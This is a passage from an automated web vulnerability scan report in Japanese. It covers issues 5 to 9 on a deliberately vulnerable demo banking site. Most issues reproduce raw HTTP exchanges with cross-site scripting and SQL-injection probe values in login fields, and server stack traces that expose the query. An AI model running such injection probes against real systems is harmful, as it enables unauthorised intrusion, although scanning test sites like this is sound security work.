ctl0_content_menuhyperlink11" href="../default.aspx?content=business_retirement.htm">retirement</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink12" href="../default.aspx?content=business_other.htm">other Services</a></li> </ul> <a id="_ctl0 ctl0_content_catlink3" class="subheader" href="../default.aspx?content=inside.htm">inside ALTORO MUTUAL</a> <ul class="sidebar"> <li><a id="_ctl0 ctl0_content_menuhyperlink13" href="../default.aspx?content=inside_about.htm">about Us</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink14" href="../default.aspx?content=inside_contact.htm">contact Us</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink15" href="../cgi.exe">locations</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink16" href="../default.aspx?content=inside_investor.htm">investor Relations</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink17" href="../default.aspx?content=inside_press.htm">press Room</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink18" href="../default.aspx?content=inside_careers.htm">careers</a></li> </ul> </td> <td valign="top" colspan="3" class="bb"> <div class="fl" style="width: 99%;"> <h1>online Banking Login</h1> <!-- To get the latest admin login, please contact SiteOps at 415-555-6159 --> <p><span id="_ctl0 ctl0_content_main_message" style="color:#ff0066;font-size:12pt;font-weight:bold;">login Failed: We're sorry, but this username was not found in our system. Please try again.</span></p> <form action="login.aspx" method="post" name="login" id="login" onsubmit="return (confirminput(login));"> <table> <tr> <td> Username: </td> <td> <input type="text" id="uid" name="uid" value="1234 "onmouseover="alert(13)" " style="width: 150px;"> </td> <td> </td> </tr> <tr> <td> Password: </td> <td> <input type="password" id="passw" name="passw" style="width: 150px;"> </td> </tr> <tr> <td></td> <td> <input type="submit" name="btnsubmit" value="login"> </td> </tr> </table> </form> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 15 -
<script> function setfocus() { if (document.login.uid.value=="") { document.login.uid.focus(); else { document.login.passw.focus(); function confirminput(myform) { if (myform.uid.value.length && myform.passw.value.length) { return (true); else if (!(myform.uid.value.length)) { myform.reset(); myform.uid.focus(); alert ("You must enter a valid username"); return (false); else { myform.passw.focus(); alert ("You must enter a valid password"); return (false); window.onload = setfocus; </script> </td> </tr> </table> <div id="footer" style="width: 99%;"> <a id="_ctl0 ctl0_hyperlink5" href="../default.aspx?content=privacy.htm">privacy Policy</a> <a id="_ctl0 ctl0_hyperlink6" href="../default.aspx?content=security.htm">security Statement</a> 2013 Altoro Mutual, Inc. <div class="disclaimer"> The Altoro Mutual website is published by IBM, Inc. for the sole purpose of demonstrating the effectiveness of AppScan in detecting web application vulnerabilities and website defects. [0x9][0x9]IBM offers a<a id="_ctl0 ctl0_downloaddemo2" href="http://www.ibm.com/developerworks/downloads/r/appscan/"> free trial of AppScan </a>that you can download and use to scan this website. [0x9][0x9]This site is not a real banking site. [0x9][0x9]Similarities, if any, to third party products and/or websites are purely coincidental. This site is provided "as is" without warranty of any kind, either express or implied. Watchfire does not assume any risk in relation to your use of this website. For additional Terms of Use, please go to <a id="_ctl0 ctl0_hyperlink7" href="http://www.ibm.com/legal/us/en/?lnk=flg-toususen">terms of Use on ibm.com</a>.<br /><br /> Copyright 2013, Watchfire Corporation, All rights reserved. </body> </html> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 16 -
問 題 5 / 13 [ 高 ] 暗 号 化 されていないログイン 要 求 問 題 : 34534 重 大 度 : 高 URL: http://demo.testfire.net/bank/login.aspx リスク: 暗 号 化 されずに 送 信 されているユーザー 名 やパスワードなどのユーザー ログイン 情 報 を 盗 み 出 せる 可 能 性 があります 修 正 : 機 密 情 報 を 送 信 するときには 必 ず SSL および POST (body) パラメーターを 使 用 してください バリアント 1 / 1 論 拠 : 要 求 / 応 答 : POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 39 uid=1234&passw=demo1234&btnsubmit=login HTTP/1.1 200 OK Date: Thu, 31 Jan 2013 04:37:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 9154 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0 ctl0_head"><title> [0x9]Altoro Mutual: Online Banking Login </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /><meta name="keywords" content="altoro Mutual Login, login, authenticate"></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 17 -
問 題 6 / 13 [ 中 ] セッション 識 別 子 が 未 更 新 問 題 : 34606 重 大 度 : 中 URL: http://demo.testfire.net/bank/login.aspx リスク: ハッカーが 正 規 のユーザーになりすまし ユーザーのレコードを 表 示 または 改 変 したり ユーザーとしてトランザクションを 実 行 する のに 使 用 することができるカスタマー セッションおよび Cookie を 盗 み 出 したり 操 作 することができます 修 正 : 外 部 で 作 成 されたセッション 識 別 子 を 受 け 入 れないようにします バリアント 1 / 1 論 拠 : 要 求 / 応 答 : POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 39 uid=1234&passw=demo1234&btnsubmit=login HTTP/1.1 200 OK Date: Thu, 31 Jan 2013 04:37:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 9154 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0 ctl0_head"><title> [0x9]Altoro Mutual: Online Banking Login </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /><meta name="keywords" content="altoro Mutual Login, login, authenticate"></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 18 -
問 題 7 / 13 [ 低 ] データベース エラー パターンを 検 出 問 題 : 177 重 大 度 : 低 URL: http://demo.testfire.net/bank/login.aspx パラメーター: uid リスク: データベース エントリーおよびテーブルを 表 示 改 変 または 削 除 することができます 修 正 : Review possible solutions for hazardous character injection バリアント 1 / 1 元 の 要 求 に 以 下 の 変 更 が 適 用 されました: 論 拠 : 要 求 / 応 答 : 'uid' '1234'")/>WFXSSProbe' SQL SQL POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 54 uid=1234'")/>wfxssprobe &passw=demo1234&btnsubmit=login HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 31 Jan 2013 04:38:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0_head"><title> [0x9]Altoro Mutual: Server Error </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch" method="get" action="/search.aspx"> [0x9] <table width="100%" border="0" cellpadding="0" cellspacing="0"> [0x9][0x9] <tr> [0x9][0x9] <td rowspan="2"> [0x9][0x9][0x9][0x9]<a id="_ctl0_hyperlink1" href="../default.aspx" style="height:80px;width:183px;"><img src="../images/logo.gif" border="0" /></a> [0x9][0x9][0x9][0x9]<a id="_ctl0_downloaddemo" href="http://www.ibm.com/developerworks/downloads/r/appscan/" style="height:80px;width:220px;"><img src="../images/banner.png" border="0" /></a> [0x9][0x9][0x9] </td> [0x9][0x9][0x9] <td align="right" valign="top"> [0x9][0x9][0x9] <a id="_ctl0_loginlink" title="it does not appear that you have properly authenticated yourself. Please click here to sign in." href="login.aspx" style="color:red;font-weight:bold;">sign In</a> <a id="_ctl0_hyperlink3" href="../default.aspx?content=inside_contact.htm">contact Us</a> <a id="_ctl0_hyperlink4" href="../feedback.aspx">feedback</a> <label for="txtsearch">search</label> <input type="text" name="txtsearch" id="txtsearch" accesskey="s" /> <input type="submit" value="go" /> [0x9][0x9][0x9] </td> [0x9][0x9] </tr> [0x9][0x9] <tr> [0x9][0x9][0x9] <td align="right" style="backgroundimage:url(/images/gradient.jpg);padding:0px;margin:0px;"><img id="_ctl0_image1" src="../images/header_pic.jpg" border="0" style="height:60px;width:354px;" /></td> [0x9][0x9] </tr> [0x9] </table> [0x9]</form> <div id="wrapper" style="width: 99%;"> <div class="err" style="width: 99%;"> <h1>an Error Has Occurred</h1> <h2>summary:</h2> <p><b><span id="_ctl0_content_lblsummary"> Syntax error in string in query expression 'username = '1234'")/>WFXSSProbe' AND password = 'Demo1234''. Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 19 -
</span></b></p> <h2>error Message:</h2> <p><span id="_ctl0_content_lbldetails">system.data.oledb. OleDbException : Syntax error in string in query expression 'username = '1234'")/>WFXSSProbe' AND password = 'Demo1234''. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr) at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbparams, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, String srctable) at Altoro.Authentication.ValidateUser(String uname, String pword) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender, EventArgs e) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 33 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includestagesbeforeasyncpoint, Boolean includestagesafterasyncpoint)</span></p> <div id="footer" style="width: 99%;"> <a id="_ctl0_hyperlink5" href="../default.aspx?content=privacy.htm">privacy Policy</a> <a id="_ctl0_hyperlink6" href="../default.aspx?content=security.htm">security Statement</a> 2013 Altoro Mutual, Inc. <div class="disclaimer"> The Altoro Mutual website is published by IBM, Inc. for the sole purpose of demonstrating the effectiveness of AppScan in detecting web application vulnerabilities and website defects. [0x9][0x9]IBM offers a<a id="_ctl0_downloaddemo2" href="http://www.ibm.com/developerworks/downloads/r/appscan/"> free trial of AppScan </a>that you can download and use to scan this website. [0x9][0x9]This site is not a real banking site. [0x9][0x9]Similarities, if any, to third party products and/or websites are purely coincidental. This site is provided "as is" without warranty of any kind, either express or implied. Watchfire does not assume any risk in relation to your use of this website. For additional Terms of Use, please go to <a id="_ctl0_hyperlink7" href="http://www.ibm.com/legal/us/en/?lnk=flg-tous-usen">terms of Use on ibm.com</a>.<br /><br /> Copyright 2013, Watchfire Corporation, All rights reserved. </body> </html> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 20 -
問 題 8 / 13 [ 低 ] データベース エラー パターンを 検 出 問 題 : 180 重 大 度 : 低 URL: http://demo.testfire.net/bank/login.aspx リスク: データベース エントリーおよびテーブルを 表 示 改 変 または 削 除 することができます 修 正 : Review possible solutions for hazardous character injection バリアント 1 / 1 元 の 要 求 に 以 下 の 変 更 が 適 用 されました: 論 拠 : - 'uid' '%3E%22%27%3E%3Cscript%3Ealert%2823%29%3C%2Fscript%3E' - 'passw' '%3E%22%27%3E%3Cscript%3Ealert%2823%29%3C%2Fscript%3E' - 'btnsubmit' '%3E%22%27%3E%3Cscript%3Ealert%2823%29%3C%2Fscript%3E' 要 求 / 応 答 : SQL SQL POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 178 uid=%3e%22%27%3e%3cscript%3ealert%2823%29%3c%2fscript%3e & passw=%3e%22%27%3e%3cscript%3ealert%2823%29%3c%2f script%3e & btnsubmit=%3e%22%27%3e%3cscript%3ealert%2823%29%3c%2fscript%3e HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 31 Jan 2013 04:38:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0_head"><title> [0x9]Altoro Mutual: Server Error </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch" method="get" action="/search.aspx"> [0x9] <table width="100%" border="0" cellpadding="0" cellspacing="0"> [0x9][0x9] <tr> [0x9][0x9] <td rowspan="2"> [0x9][0x9][0x9][0x9]<a id="_ctl0_hyperlink1" href="../default.aspx" style="height:80px;width:183px;"><img src="../images/logo.gif" border="0" /></a> [0x9][0x9][0x9][0x9]<a id="_ctl0_downloaddemo" href="http://www.ibm.com/developerworks/downloads/r/appscan/" style="height:80px;width:220px;"><img src="../images/banner.png" border="0" /></a> [0x9][0x9][0x9] </td> [0x9][0x9][0x9] <td align="right" valign="top"> [0x9][0x9][0x9] <a id="_ctl0_loginlink" title="it does not appear that you have properly authenticated yourself. Please click here to sign in." href="login.aspx" style="color:red;font-weight:bold;">sign In</a> <a id="_ctl0_hyperlink3" href="../default.aspx?content=inside_contact.htm">contact Us</a> <a id="_ctl0_hyperlink4" href="../feedback.aspx">feedback</a> <label for="txtsearch">search</label> <input type="text" name="txtsearch" id="txtsearch" accesskey="s" /> <input type="submit" value="go" /> [0x9][0x9][0x9] </td> [0x9][0x9] </tr> [0x9][0x9] <tr> [0x9][0x9][0x9] <td align="right" style="backgroundimage:url(/images/gradient.jpg);padding:0px;margin:0px;"><img id="_ctl0_image1" src="../images/header_pic.jpg" border="0" style="height:60px;width:354px;" /></td> [0x9][0x9] </tr> [0x9] </table> [0x9]</form> <div id="wrapper" style="width: 99%;"> <div class="err" style="width: 99%;"> <h1>an Error Has Occurred</h1> <h2>summary:</h2> <p><b><span id="_ctl0_content_lblsummary"> Syntax error (missing operator) in query expression 'username = Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 21 -
'>"'><script>alert(23)</script>' AND password = '>"'><script>alert(23)</script>''. </span></b></p> <h2>error Message:</h2> <p><span id="_ctl0_content_lbldetails">system.data.oledb. OleDbException : Syntax error (missing operator) in query expression 'username = '>"'><script>alert(23)</script>' AND password = '>"'><script>alert(23)</script>''. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr) at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbparams, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, String srctable) at Altoro.Authentication.ValidateUser(String uname, String pword) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender, EventArgs e) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 33 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includestagesbeforeasyncpoint, Boolean includestagesafterasyncpoint)</span></p> <div id="footer" style="width: 99%;"> <a id="_ctl0_hyperlink5" href="../default.aspx?content=privacy.htm">privacy Policy</a> <a id="_ctl0_hyperlink6" href="../default.aspx?content=security.htm">security Statement</a> 2013 Altoro Mutual, Inc. <div class="disclaimer"> The Altoro Mutual website is published by IBM, Inc. for the sole purpose of demonstrating the effectiveness of AppScan in detecting web application vulnerabilities and website defects. [0x9][0x9]IBM offers a<a id="_ctl0_downloaddemo2" href="http://www.ibm.com/developerworks/downloads/r/appscan/"> free trial of AppScan </a>that you can download and use to scan this website. [0x9][0x9]This site is not a real banking site. [0x9][0x9]Similarities, if any, to third party products and/or websites are purely coincidental. This site is provided "as is" without warranty of any kind, either express or implied. Watchfire does not assume any risk in relation to your use of this website. For additional Terms of Use, please go to <a id="_ctl0_hyperlink7" href="http://www.ibm.com/legal/us/en/?lnk=flg-tous-usen">terms of Use on ibm.com</a>.<br /><br /> Copyright 2013, Watchfire Corporation, All rights reserved. </body> </html> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 22 -
問 題 9 / 13 [ 低 ] データベース エラー パターンを 検 出 問 題 : 182 重 大 度 : 低 URL: http://demo.testfire.net/bank/login.aspx パラメーター: passw リスク: データベース エントリーおよびテーブルを 表 示 改 変 または 削 除 することができます 修 正 : Review possible solutions for hazardous character injection バリアント 1 / 1 元 の 要 求 に 以 下 の 変 更 が 適 用 されました: 論 拠 : 要 求 / 応 答 : 'passw' 'Demo1234'")/>WFXSSProbe' SQL SQL POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 54 uid=1234& passw=demo1234'")/>wfxssprobe &btnsubmit=login HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 31 Jan 2013 04:38:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0_head"><title> [0x9]Altoro Mutual: Server Error </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch" method="get" action="/search.aspx"> [0x9] <table width="100%" border="0" cellpadding="0" cellspacing="0"> [0x9][0x9] <tr> [0x9][0x9] <td rowspan="2"> [0x9][0x9][0x9][0x9]<a id="_ctl0_hyperlink1" href="../default.aspx" style="height:80px;width:183px;"><img src="../images/logo.gif" border="0" /></a> [0x9][0x9][0x9][0x9]<a id="_ctl0_downloaddemo" href="http://www.ibm.com/developerworks/downloads/r/appscan/" style="height:80px;width:220px;"><img src="../images/banner.png" border="0" /></a> [0x9][0x9][0x9] </td> [0x9][0x9][0x9] <td align="right" valign="top"> [0x9][0x9][0x9] <a id="_ctl0_loginlink" title="it does not appear that you have properly authenticated yourself. Please click here to sign in." href="login.aspx" style="color:red;font-weight:bold;">sign In</a> <a id="_ctl0_hyperlink3" href="../default.aspx?content=inside_contact.htm">contact Us</a> <a id="_ctl0_hyperlink4" href="../feedback.aspx">feedback</a> <label for="txtsearch">search</label> <input type="text" name="txtsearch" id="txtsearch" accesskey="s" /> <input type="submit" value="go" /> [0x9][0x9][0x9] </td> [0x9][0x9] </tr> [0x9][0x9] <tr> [0x9][0x9][0x9] <td align="right" style="backgroundimage:url(/images/gradient.jpg);padding:0px;margin:0px;"><img id="_ctl0_image1" src="../images/header_pic.jpg" border="0" style="height:60px;width:354px;" /></td> [0x9][0x9] </tr> [0x9] </table> [0x9]</form> <div id="wrapper" style="width: 99%;"> <div class="err" style="width: 99%;"> <h1>an Error Has Occurred</h1> <h2>summary:</h2> <p><b><span id="_ctl0_content_lblsummary"> Syntax error in string in query expression 'username = '1234' AND password = 'Demo1234'")/>WFXSSProbe''. Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 23 -